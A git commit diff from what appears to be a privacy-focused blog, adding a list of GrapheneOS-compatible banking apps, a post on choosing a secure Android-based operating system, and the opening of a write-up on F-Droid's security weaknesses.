- [Union Bank of India - nxt](https://play.google.com/store/apps/details?id=com.infrasoft.uboi) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/141)
- [YONO SBI](https://play.google.com/store/apps/details?id=com.sbi.lotusintouch&hl=en_IN&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/79)
### Italy

- [BNL](https://play.google.com/store/apps/details?id=it.bnl.apps.banking) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/144)
- [Fineco](https://play.google.com/store/apps/details?id=com.fineco.it) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/131)

### Kazakhstan

- [Kaspi.kz](https://play.google.com/store/apps/details?id=kz.kaspi.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/149)
### Lithuania

- [Revolut](https://play.google.com/store/apps/details?id=com.revolut.revolut) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/90)

### Netherlands

- [ABN AMRO](https://play.google.com/store/apps/details?id=com.abnamro.nl.mobile.payments) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/108)
- [ASN Bank](https://play.google.com/store/search?q=asn%20bank&c=apps&hl=nl&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/105)
- [Rabobank](https://play.google.com/store/apps/details?id=nl.rabomobiel) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/47)
- [Triodos Bankieren NL](https://play.google.com/store/apps/details?id=com.triodos.bankingnl) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/133)
### Norway

- [Bank Norwegian](https://play.google.com/store/search?q=bank+norwegian&c=apps) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/95)
- [DNB Spare](https://play.google.com/store/search?q=dnb+spare+app&c=apps) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/98)
- [Engangskode sparebank 1](https://play.google.com/store/search?q=engangskode+sparebank+1&c=apps) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/100)
- [Kron](https://play.google.com/store/search?q=kron&c=apps) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/97)
- [Nordnet](https://play.google.com/store/search?q=nordnet&c=apps) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/99)
- [Sbanken](https://play.google.com/store/search?q=Sbanken&c=apps) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/96)
- [Trumf Visa](https://play.google.com/store/search?q=trumf+visa&c=apps) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/101)
- [Vipps](https://play.google.com/store/apps/details?id=no.dnb.vipps&hl=en&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/74)
### Poland

- [IKO](https://play.google.com/store/apps/details?id=pl.pkobp.iko) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/25)
- [mBank PL](https://play.google.com/store/apps/details?id=pl.mbank) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/136)

### Portugal

- [Caixadirecta Empresas](https://play.google.com/store/apps/details?id=pt.cgd.caixadirectaempresas) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/120)

### Romania

- [BT Pay — Banca Transilvania](https://play.google.com/store/apps/details?id=ro.btrl.pay) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/83)
- [Raiffeisen Smart Mobile PI](https://play.google.com/store/apps/details?id=ro.raiffeisen.smartmobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/86)
### Serbia

- [Moja mBanka Raiffeisen](https://play.google.com/store/apps/details?id=rs.Raiffeisen.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/70)

### Singapore

- [OCBC Digital](https://play.google.com/store/apps/details?id=com.ocbc.mobile&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/146)

### Spain

- [Evo Banco](https://play.google.com/store/apps/details?id=es.evobanco.bancamovil) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/112)
### Sweden

- [Avanza](https://play.google.com/store/apps/details?id=se.avanzabank.androidapplikation) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/11)
- [BankID säkerhetsapp](https://play.google.com/store/apps/details?id=com.bankid.bus) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/8)
- [Länsförsäkringar](https://play.google.com/store/apps/details?id=se.lf.mobile.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/91)
- [Mobilbank SE — Danske Bank](https://play.google.com/store/apps/details?id=com.danskebank.mobilebank3.se) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/4)
- [Nordea Mobile — Sverige](https://play.google.com/store/apps/details?id=se.nordea.mobilebank&hl=sv&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/9)
- [Swedbank private](https://play.google.com/store/apps/details?id=se.swedbank.mobil) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/12)
- [Swish payments](https://play.google.com/store/apps/details?id=se.bankgirot.swish) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/6)
### Switzerland

- [BCN Mobile banking](https://play.google.com/store/apps/details?id=com.bcn.android.mbanking) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/145)
- [Credit Suisse](https://play.google.com/store/apps/details?id=com.csg.cs.dnmb) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/72)
- [Raiffeisen E-Banking](https://play.google.com/store/apps/details?id=ch.raiffeisen.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/26)
- [ZKB Access](https://play.google.com/store/apps/details?id=ch.zkb.digipass) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/94)
- [ZKB Mobile Banking](https://play.google.com/store/apps/details?id=ch.zkb.slv.mobile.client.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/93)
### Taiwan

- [Cathay United Bank](https://play.google.com/store/apps/details?id=com.cathaybk.mymobibank.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/29)
- [Chunghwa Post](https://play.google.com/store/apps/details?id=com.mitake.android.epost) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/27)
- [CTBC Bank Home Bank](https://play.google.com/store/apps/details?id=com.chinatrust.mobilebank) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/30)
- [E.Sun Bank](https://play.google.com/store/apps/details?id=com.esunbank&hl=zh_TW&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/162)
- [Taishin International Bank](https://play.google.com/store/apps/details?id=tw.com.taishinbank.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/28)
### Ukraine

- [Privat24](https://play.google.com/store/apps/details?id=ua.privatbank.ap24) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/124)

### United Arab Emirates

- [ADCB](https://play.google.com/store/apps/details?id=com.adcb.bank) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/123)
### United Kingdom

- [Amex United Kingdom](https://play.google.com/store/apps/details?id=com.americanexpress.android.acctsvcs.uk) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/40)
- [Barclaycard](https://play.google.com/store/apps/details?id=com.barclays.bca) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/42)
- [Chase UK](https://play.google.com/store/apps/details?id=com.chase.intl) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/69)
- [First Direct](https://play.google.com/store/apps/details?id=com.firstdirect.bankingonthego&gl=UK) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/128)
- [HSBC UK Mobile Banking](https://play.google.com/store/apps/details?id=uk.co.hsbc.hsbcukmobilebanking&hl=en) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/33)
- [Lloyds Bank Mobile Banking](https://play.google.com/store/apps/details?id=com.grppl.android.shell.CMBlloydsTSB73) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/53)
- [Monzo Bank](https://play.google.com/store/apps/details?id=co.uk.getmondo) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/58)
- [Revolut](https://play.google.com/store/apps/details?id=com.revolut.revolut) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/90)
- [Starling Bank - Mobile Banking](https://play.google.com/store/apps/details?id=com.starlingbank.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/39)
- [Tesco Bank](https://play.google.com/store/apps/details?id=com.tescobank.mobile&gl=UK) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/129)
- [Triodos Bank UK](https://play.google.com/store/apps/details?id=com.triodos.bankinguk) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/132)
- [TSB Internet Banking](https://play.google.com/store/apps/details?id=uk.co.tsb.newmobilebank&hl=en_GB&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/143)
- [Virgin Money Mobile Banking](https://play.google.com/store/apps/details?id=com.virginmoney.uk.mobile.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/54)
### United States

- [Alliant Mobile Banking](https://play.google.com/store/apps/details?id=org.alliant.mobile&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/85)
- [Ally: Banking & Investing](https://play.google.com/store/apps/details?id=com.ally.MobileBanking&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/113)
- [America First Mobile Banking](https://play.google.com/store/apps/details?id=com.afcu.mobilebanking) - [Report](https://play.google.com/store/apps/details?id=com.afcu.mobilebanking)
- [American Express](https://play.google.com/store/apps/details?id=com.americanexpress.android.acctsvcs.us) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/125)
- [BECU](https://play.google.com/store/apps/details?id=org.becu.androidapp&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/60)
- [Capital One Mobile](https://play.google.com/store/apps/details?id=com.konylabs.capitalone&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/107)
- [Chase Mobile](https://play.google.com/store/apps/details?id=com.chase.sig.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/13)
- [Chime Mobile Banking](https://play.google.com/store/apps/details?id=com.onedebit.chime&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/46)
- [Citizens Bank Mobile](https://play.google.com/store/apps/details?id=com.citizensbank.androidapp) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/66)
- [CommunityAmerica Mobile](https://play.google.com/store/apps/details?id=com.ifs.banking.fiid1454) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/154)
- [DCU Digital Banking](https://play.google.com/store/apps/details?id=com.projectfinance.android.dcu) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/67)
- [Discover Mobile](https://play.google.com/store/apps/details?id=com.discoverfinancial.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/64)
- [Fidelity Investments](https://play.google.com/store/apps/details?id=com.fidelity.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/65)
- [Fifth Third Mobile Banking](https://play.google.com/store/apps/details?id=com.clairmail.fth) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/41)
- [First Merchants Mobile](https://play.google.com/store/apps/details?id=com.mfoundry.mb.android.mb_lx7) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/158)
- [Greenstate CU Mobile](https://play.google.com/store/apps/details?id=com.q2e.universityofiowacommunitycreditunion5086.mobile.production&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/122)
- [Grow Mobile Banking](https://play.google.com/store/apps/details?id=com.growfinancialfcu.growfinancialfcu&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/68)
- [GTE Mobile](https://play.google.com/store/apps/details?id=org.gtefinancial.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/81)
- [GTE Cards (GTE Financial - Debit/Credit card management)](https://play.google.com/store/apps/details?id=com.a84102934.wallet.cardcontrol) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/82)
- [Mainstreet Credit Union](https://play.google.com/store/apps/details?id=org.mainstreetcu.grip) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/111)
- [SchoolsFirst FCU Mobile](https://play.google.com/store/apps/details?id=org.schoolsfirstfcu.mobile.banking.isam) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/126)
- [Schwab Mobile](https://play.google.com/store/apps/details?id=com.schwab.mobile&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/61)
- [Texan CU Mobile](https://play.google.com/store/apps/details?id=com.ifs.banking.fiid1373) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/56)
- [USAA Mobile](https://play.google.com/store/apps/details?id=com.usaa.mobile.android.usaa&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/80)
- [U.S. Bank Mobile](https://play.google.com/store/apps/details?id=com.usbank.mobilebanking&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/84)
- [Wells Fargo Mobile](https://play.google.com/store/apps/details?id=com.wf.wellsfargomobile&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/63)
---

## List of Submitted Banking Apps
Here you will find a current list of submitted banking apps that work on GrapheneOS, via this project's [issue-tracker](https://github.com/akc3n/banking/issues).
## Submit a Banking App

**Report a banking app's compatibility on GrapheneOS**

Please use this issue form to submit a report on the banking app that you use on GrapheneOS:
**[SUBMIT REPORT](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/new?assignees=&labels=&template=app_report.yml)**

---
## Notes
If you have any issues with what is listed on this site or about this project page, you may open an issue on the [issue-tracker](https://github.com/PrivSec-dev/banking-apps-compat-report/issues).
- GrapheneOS has a [detailed guide](https://grapheneos.org/articles/attestation-compatibility-guide) for app developers on how to support GrapheneOS with the hardware attestation API. Direct use of the hardware attestation API provides much higher assurance than using SafetyNet, so these apps have nothing to lose by using a more meaningful API and supporting a more secure OS.
> GrapheneOS users are strongly encouraged to share this documentation with app developers enforcing only being able to use the stock OS. Send an email to the developers and leave a review of the app with a link to this information. Share it with other users and create pressure to support GrapheneOS rather than locking users into the stock OS without a valid security reason. GrapheneOS not only upholds the app security model but substantially reinforces it, so it cannot be justified with reasoning based on security, anti-fraud, etc.
[^1]: [GrapheneOS Banking apps - paras. 3, ln. 2](https://grapheneos.org/usage#banking-apps)

@ -0,0 +1,109 @@
---
title: "Choosing Your Android-Based Operating System"
date: 2022-07-18
tags: ['Operating Systems', 'Android', 'Privacy', 'Security']
author: Tommy
---
Android is a secure operating system that has strong [app sandboxing](https://source.android.com/security/app-sandbox), [Verified Boot](https://source.android.com/security/verifiedboot) (AVB), and a robust [permission](https://developer.android.com/guide/topics/permissions/overview) control system.
When you buy an Android phone, the device's default operating system often comes with invasive integration with apps and services that are not part of the [Android Open-Source Project](https://source.android.com/). An example of such is Google Play Services, which has irrevocable privileges to access your files, contacts storage, call logs, SMS messages, location, camera, microphone, hardware identifiers, and so on. These apps and services increase the attack surface of your device and are the source of various privacy concerns with Android.
|
||||
|
||||
This problem could be solved by using a custom Android-based operating system that does not come with such invasive integration. Unfortunately, many custom Android-based operating systems often violate the Android security model by not supporting critical security features such as AVB, rollback protection, firmware updates, and so on. Some of them also ship [`userdebug`](https://source.android.com/setup/build/building#choose-a-target) builds which expose root over [ADB](https://developer.android.com/studio/command-line/adb) and require [more permissive](https://github.com/LineageOS/android_system_sepolicy/search?q=userdebug&type=code) SELinux policies to accommodate debugging features, resulting in a further increased attack surface and weakened security model.
|
||||
|
||||
When choosing a custom Android-based operating system, you should make sure that it upholds the Android security model. Ideally, the custom operating system should have substantial privacy and security improvements to justify adding yet another party to trust.
|
||||
|
||||
## Baseline Security
|
||||
|
||||

### Verified Boot



[Verified Boot](https://source.android.com/security/verifiedboot) is an important part of the Android security model. It provides protection against [evil maid](https://en.wikipedia.org/wiki/Evil_maid_attack) attacks and malware persistence, and ensures security updates cannot be downgraded thanks to [rollback protection](https://source.android.com/security/verifiedboot/verified-boot#rollback-protection).

On Android, only your data (inside the /data partition) is encrypted; the operating system files are left unencrypted. Verified Boot ensures the integrity of the operating system files, thereby preventing an adversary with physical access from tampering with the device or installing malware on it. In the unlikely case that malware is able to exploit other parts of the system and gain higher privileged access, Verified Boot will prevent and revert changes to the system partition upon rebooting the device.
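
As an aside, you can read the Verified Boot state a device reports over ADB; a quick sketch, assuming USB debugging is enabled (`green` means the device booted an operating system verified against a trusted key):

```
$ adb shell getprop ro.boot.verifiedbootstate
green
```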

Unfortunately, OEMs are only obliged to support Verified Boot on their stock Android distribution. Only a few OEMs, such as Google, support custom AVB key enrollment on their devices. Additionally, some AOSP derivatives such as LineageOS or /e/ OS do not support Verified Boot even on hardware with Verified Boot support for third-party operating systems. These AOSP derivatives should be avoided at all costs.

### Firmware Updates

Firmware updates are critical for maintaining security; without them, your device cannot be secure. OEMs have support agreements with their partners to provide the closed-source components for a limited support period. These are detailed in the monthly [Android Security Bulletins](https://source.android.com/security/bulletin).

On a custom Android distribution, it is the responsibility of the operating system vendor to extract the firmware from the stock operating system, test it against their Android builds, then ship it to the user.

Unfortunately, many custom Android distributions, including extremely popular ones like LineageOS and /e/ OS, do not ship firmware updates for most of their supported devices. Instead, they expect users to keep track of stock OS updates and to extract and flash the firmware themselves. Beyond the lack of testing, this is extremely burdensome and not feasible for most end users, and it is yet another reason not to use these distributions.

### Patch Levels

As the [Android Security Bulletins](https://source.android.com/security/bulletin) are updated every month, Android-based operating systems are expected to apply all security fixes before the next bulletin update comes out. Besides extracting the firmware, testing it, and shipping it to the end user as described [above](#firmware-updates), the AOSP-based system also needs to be updated.
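
You can check where a given build stands by reading its patch level property over ADB; a small sketch, assuming USB debugging is enabled (the date shown is just an example):

```
$ adb shell getprop ro.build.version.security_patch
2022-07-05
```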

This is a particularly challenging thing to do, especially around the time of a new major Android release, since there are a lot of changes. Sometimes, newer firmware versions require newer major versions of AOSP, and if the developer takes too long to update their base operating system to the next major AOSP version, they cannot ship firmware updates either, leaving users vulnerable.

This happened to CalyxOS during the Android 11 to Android 12 transition. It took them [4 months](https://github.com/privacyguides/privacyguides.org/pull/578#issue-1112002737) to update to Android 12, and during those 4 months they could not ship any firmware updates at all, leaving their users vulnerable during that time period.

You would be much better off just sticking with the stock operating system (which got updated to Android 12 shortly after the AOSP 12 release) instead of using a custom operating system that could not keep up with updates as described.

### Chromium WebView Updates

Android comes with a system [WebView](https://developer.android.com/reference/android/webkit/WebView), a component that many apps rely on as part of their activity layout. It effectively behaves like a minimal browser, opening websites with arbitrary code from the internet. Thus, it is very important that this component is consistently kept up to date.

Some Android-based operating systems, including ones like CalyxOS, often fall behind on security updates for this component. Particularly, this has gotten so bad that they actually fell behind for [3 months](https://github.com/privacyguides/privacyguides.org/pull/548#issuecomment-1018245074) back in January 2022 and [2 months](https://github.com/privacyguides/privacyguides.org/pull/1378) in June 2022. It is a good indication that these operating systems cannot keep up with security updates and should not be used.

### User Builds

As mentioned [above](/posts/os/choosing-your-android-based-operating-system/), `userdebug` builds expose root over ADB and require more permissive SELinux policies to accommodate debugging features. `userdebug` builds violate the Android security model and are really only meant for developers to test out their Android builds during development.

End users should be using the production `user` builds, and any distributions that fail to deliver them, like LineageOS or /e/ OS, should be avoided.

### SELinux in Enforcing Mode

[SELinux](https://source.android.com/security/selinux) is a critical part of the Android security model, with the Linux kernel enforcing confinement for all processes, including system processes running as root.

In order for a system to be secure, it must have SELinux in Enforcing mode, accompanied by fine-grained SELinux policies.

Unfortunately, many custom Android-based operating system builds (especially unofficial LineageOS builds) disable SELinux or set it to Permissive mode. You can check whether SELinux is in Enforcing mode by executing `getenforce` in the ADB shell (the expected output is `Enforcing`). You should avoid any Android-based operating system builds that do not have SELinux in Enforcing mode at all costs.
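
For example, from a computer with ADB set up:

```
$ adb shell getenforce
Enforcing
```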



## Recommended Android-Based Operating Systems

Currently, I am only aware of two Android-based operating systems that should be used over the stock operating systems:

### GrapheneOS



[GrapheneOS](https://grapheneos.org) is the **only** custom Android-based operating system you should buy a new phone for. It provides additional [security hardening](https://en.wikipedia.org/wiki/Hardening_(computing)) and privacy improvements over the stock operating system from Google. It has a [hardened memory allocator](https://github.com/GrapheneOS/hardened_malloc), network and sensor permissions, and various other [security features](https://grapheneos.org/features). GrapheneOS also comes with full firmware updates and signed builds, so Verified Boot is fully supported. Here is a quick video demonstrating the network and sensors permissions:

{{< youtube id="hx2eiPTe7Zg">}}

For usability purposes, GrapheneOS supports [Sandboxed Google Play](https://grapheneos.org/usage#sandboxed-google-play), which runs Google Play Services fully sandboxed like any other regular app. This means you can take advantage of most Google Play services, such as [push notifications](https://firebase.google.com/docs/cloud-messaging/), while giving you full control over their permissions and access, and while containing them to a specific work profile or user profile of your choice. Most interestingly, the [In-app Billing API](https://android-doc.github.io/google/play/billing/api.html), [Google Play Games](https://play.google.com/googleplaygames), [Play Asset Delivery](https://developer.android.com/guide/playcore/asset-delivery), and [FIDO2](/posts/knowledge/multi-factor-authentication/#fido2-fast-identity-online) all work exceptionally well. Most [Advanced Protection Program](https://landing.google.com/advancedprotection/) features, except for [Play Protect](https://support.google.com/googleplay/answer/2812853?hl=en) and restricted app installation, also work.

Because GrapheneOS does not grant privileged access to the system to any Google apps and services (apart from the opt-in eSIM action app), Play Protect cannot disable or uninstall known malicious applications when it detects them. As for restricted app installation, this feature is not that useful on the stock operating system anyway, since it is bypassable with `adb push`.

Recently, GrapheneOS has also added the [Storage Scopes](https://grapheneos.org/usage#storage-access) feature, allowing you to force apps that request broad storage access permission to function with scoped storage. With this new feature, you no longer have to grant certain apps access to all of your media or files in order to use them. You can watch a video of Storage Scopes in action here:

{{< youtube id="WjrANjvrSzw">}}

Currently, Google Pixel phones are the only devices that meet GrapheneOS's [hardware security requirements](https://grapheneos.org/faq#device-support).

### DivestOS

[DivestOS](https://divestos.org/) is a great aftermarket operating system for devices that have gone end-of-life or are near end-of-life. Note that this is a harm reduction project, run by one developer on a best-effort basis, and you should not buy a new device just to run DivestOS.

Being a soft-fork of [LineageOS](https://lineageos.org/), DivestOS inherits many [supported devices](https://divestos.org/index.php?page=devices&base=LineageOS) from LineageOS. It has signed builds, making it possible to have [verified boot](https://source.android.com/security/verifiedboot) on some non-Pixel devices.

It comes with substantial hardening over AOSP. DivestOS has automated kernel vulnerability ([CVE](https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures)) [patching](https://gitlab.com/divested-mobile/cve_checker), fewer proprietary blobs, a custom [hosts](https://divested.dev/index.php?page=dnsbl) file, and various security features ported from GrapheneOS. A non-exhaustive list of these includes:

- A hardened WebView. [Mulch](https://gitlab.com/divested-mobile/mulch) comes with *some* patches from GrapheneOS's Vanadium browser and the [Bromite](https://github.com/bromite/bromite) project. It gets updated fairly quickly and does not fall behind nearly as much as Bromite.
- Kernel patches from GrapheneOS, with all available kernel security features enabled via [defconfig hardening](https://github.com/Divested-Mobile/DivestOS-Build/blob/master/Scripts/Common/Functions.sh#L758). All kernels newer than version 3.4 include full page [sanitization](https://lwn.net/Articles/334747/), and all ~22 Clang-compiled kernels have [`-ftrivial-auto-var-init=zero`](https://reviews.llvm.org/D54604?id=174471) enabled.
- GrapheneOS's [`INTERNET`](https://developer.android.com/training/basics/network-ops/connecting) and `SENSORS` permission toggles
- [Hardened memory allocator](https://github.com/GrapheneOS/hardened_malloc)
- [Secure Exec-Spawning](https://grapheneos.org/usage#exec-spawning)
- Partial [bionic](https://en.wikipedia.org/wiki/Bionic_(software)) hardening patchsets from GrapheneOS
- GrapheneOS's per-network full [MAC randomization](https://en.wikipedia.org/wiki/MAC_address#Randomization) option on version 17.1 and higher
- Automatic reboot/Wi-Fi/Bluetooth [timeout options](https://grapheneos.org/features)

With that being said, DivestOS is not without its faults. The developer does not have all of the devices he is building for, and for a lot of them he simply publishes the builds blind without actually testing them. Firmware update support [varies](https://gitlab.com/divested-mobile/firmware-empty/-/blob/master/STATUS) across devices. DivestOS also takes a very long time to update to a new major Android version, and actually took longer than CalyxOS did, as mentioned [above](#patch-levels). It does not tend to fall behind on Chromium updates like CalyxOS, however.

Also, please note that I am only recommending DivestOS here, and not any of its related apps. For instance, I would not recommend using Mull, since it is just a Firefox Android fork with better defaults and still inherits many security deficiencies from its upstream, including the lack of support for [site isolation](https://wiki.mozilla.org/Project_Fission) and [isolatedProcess](https://bugzilla.mozilla.org/show_bug.cgi?id=1565196).

215
content/posts/android/F-Droid Security Issues.md
Normal file

@ -0,0 +1,215 @@
---
title: "F-Droid Security Issues"
date: 2022-01-02T21:28:31Z
tags: ['Applications', 'Android', 'Security']
author: Wonderfall
canonicalURL: https://wonderfall.dev/fdroid-issues
ShowCanonicalLink: true
---

F-Droid is a popular alternative app repository for Android, especially known for its main repository dedicated to free and open-source software. F-Droid is often recommended among security and privacy enthusiasts, but how does it stack up against Play Store in practice? This write-up will attempt to emphasize major security issues with F-Droid that you should consider.

Before we start, a few things to keep in mind:

- The main goal of this write-up was to inform users so they can make responsible choices, not to trash someone else's work. I have respect for any work done in the name of good intentions. Likewise, please don't misinterpret the intentions of this article.
- You have your own reasons for using open-source or free/libre/whatever software which won't be discussed here. A development model shouldn't be an excuse for bad practices and shouldn't lure you into believing that it can provide strong guarantees it cannot.
- A lot of information in this article is sourced from official and trusted sources, but you're welcome to do your own research.
- These analyses do not account for threat models and personal preferences. As the author of this article, I'm only interested in facts and not ideologies.

*This is not an in-depth security review, nor is it exhaustive.*

## 1. The trusted party problem

To understand why this is a problem, you'll have to understand a bit about F-Droid's architecture, the things it does very differently from other app repositories, and the [Android platform security model](https://arxiv.org/pdf/1904.05572.pdf) (some of the issues listed in this article are somewhat out of the scope of the OS security model, but the majority is).

Unlike other repositories, F-Droid signs all the apps in the main repository with **its own signing keys** (unique per app), with the exception of the very few [reproducible builds](https://f-droid.org/en/docs/Reproducible_Builds/). A signature is a mathematical scheme that guarantees the authenticity of the applications you download. Upon the installation of an app, Android pins the signature across the entire OS (including user profiles): that's what we call a *trust-on-first-use* model, since all subsequent updates of the app must have the corresponding signature to be installed.

Normally, the developer is supposed to sign their own app prior to its upload on a distribution channel, whether that is a website or a traditional repository (or both). You don't have to trust the source (usually recommended by the developer) except for the first installation: future updates will have their authenticity cryptographically guaranteed. The issue with F-Droid is that all apps are signed by the same party (F-Droid), which is also not the developer. You're now adding another party you'll have to trust, since **you still have to trust the developer** anyway, which isn't ideal: **the fewer parties, the better**.

On the other hand, Play Store now manages the app signing keys too, as [Play App Signing](https://developer.android.com/studio/publish/app-signing#app-signing-google-play) is required for app bundles, which are required for new apps since August 2021. These signing keys can be uploaded or automatically generated, and are securely stored by [Google Cloud Key Management Service](https://services.google.com/fh/files/misc/security_whitepapers_march2018.pdf). It should be noted that the developer still has to sign the app with **an upload key** so that Google can verify its authenticity before signing it with the app signing key. For apps created before August 2021 that may have [not opted into Play App Signing](https://developer.android.com/studio/publish/app-signing#opt-out) yet, the developer still manages the private key and is responsible for its security, as a compromised private key can allow a third party to sign and distribute malicious code.

F-Droid requires that the source code of the app is exempt from any proprietary library or ad service, according to their [inclusion policy](https://f-droid.org/en/docs/Inclusion_Policy/). Usually, that means that some developers will have to maintain a slightly different version of their codebase that complies with F-Droid's requirements. Besides, their "quality control" offers **close to no guarantees**, as having access to the source code doesn't mean it can be easily proofread. Saying Play Store is filled with malicious apps is beside the point: the **false sense of security** is a real issue. Users should not think of the F-Droid main repository as free of malicious apps, yet unfortunately many are inclined to believe this.

> But... can't I just trust F-Droid and be done with it?

[You don't have to take my word for it](https://forum.f-droid.org/t/is-it-as-safe-as-it-is-from-fdroid-official-repo/15956/12): they openly admit themselves that it's a [very basic process](https://forum.f-droid.org/t/is-it-as-safe-as-it-is-from-fdroid-official-repo/15956/2) relying on badness enumeration (which doesn't work, by the way) that consists of a few scripts scanning the code for proprietary blobs and known trackers. You are therefore not exempted from trusting upstream developers, and this goes for any repository.

*A tempting idea would be to compare F-Droid to the desktop Linux model where users trust their distribution maintainers out-of-the-box (this can be sane if you're already trusting the OS anyway), but the desktop platform is intrinsically chaotic and heterogeneous, for better and for worse. It really shouldn't be compared to the Android platform in any way.*

While we've seen that F-Droid controls the signing servers (much like Play App Signing), F-Droid also fully controls the build servers that run the disposable VMs used for building apps. And [as of July 2022](https://gitlab.com/groups/fdroid/-/milestones/5#tab-issues), their guest VM image officially runs a version of Debian which has reached EOL. Undoubtedly, this raises questions about the security of their whole infrastructure.

> How can you be sure that the app repository can be held to account for the code it delivers?

F-Droid's answer, interesting yet largely unused, is [build reproducibility](https://f-droid.org/en/docs/Reproducible_Builds/). While deterministic builds are a neat idea in theory, they require the developer to make their toolchain match what F-Droid provides. It's additional work on both ends, sometimes resulting in [apps severely lagging behind in updates](https://code.briarproject.org/briar/briar/-/issues/1612), so reproducible builds are not as common as we would have wanted. It should be noted that reproducible builds in the main repository can be exclusively developer-signed.

